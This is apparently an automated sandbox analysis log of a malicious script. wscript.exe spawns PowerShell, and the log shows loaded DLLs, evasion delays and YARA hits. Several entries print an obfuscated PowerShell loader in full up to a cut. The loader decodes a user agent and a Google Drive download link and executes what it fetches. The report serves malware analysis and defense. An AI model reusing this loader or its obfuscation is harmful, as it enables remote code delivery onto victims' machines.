      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000002.00000002.1679719190.000001E9B2511000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1679719190.000001E9B24BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1679517302.000001E9B2498000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1679719190.000001E9B24E1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: pdblib.pdbXt source: powershell.exe, 00000002.00000002.1646651748.000001E9983A1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdbP source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.1679719190.000001E9B2511000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb#e source: powershell.exe, 00000002.00000002.1679517302.000001E9B2498000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overforto", "0")
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCKulleuGruo.rdesmoiNrlsttaand,YF.reaP Suger UnenOUdkldTRu udoKompoc.r
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFor
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAForJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4130Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5765Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000002.1484575349.000001400BC6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\p
      Source: powershell.exe, 00000002.00000002.1679010895.000001E9B222B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: amsi64_432.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 432, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask 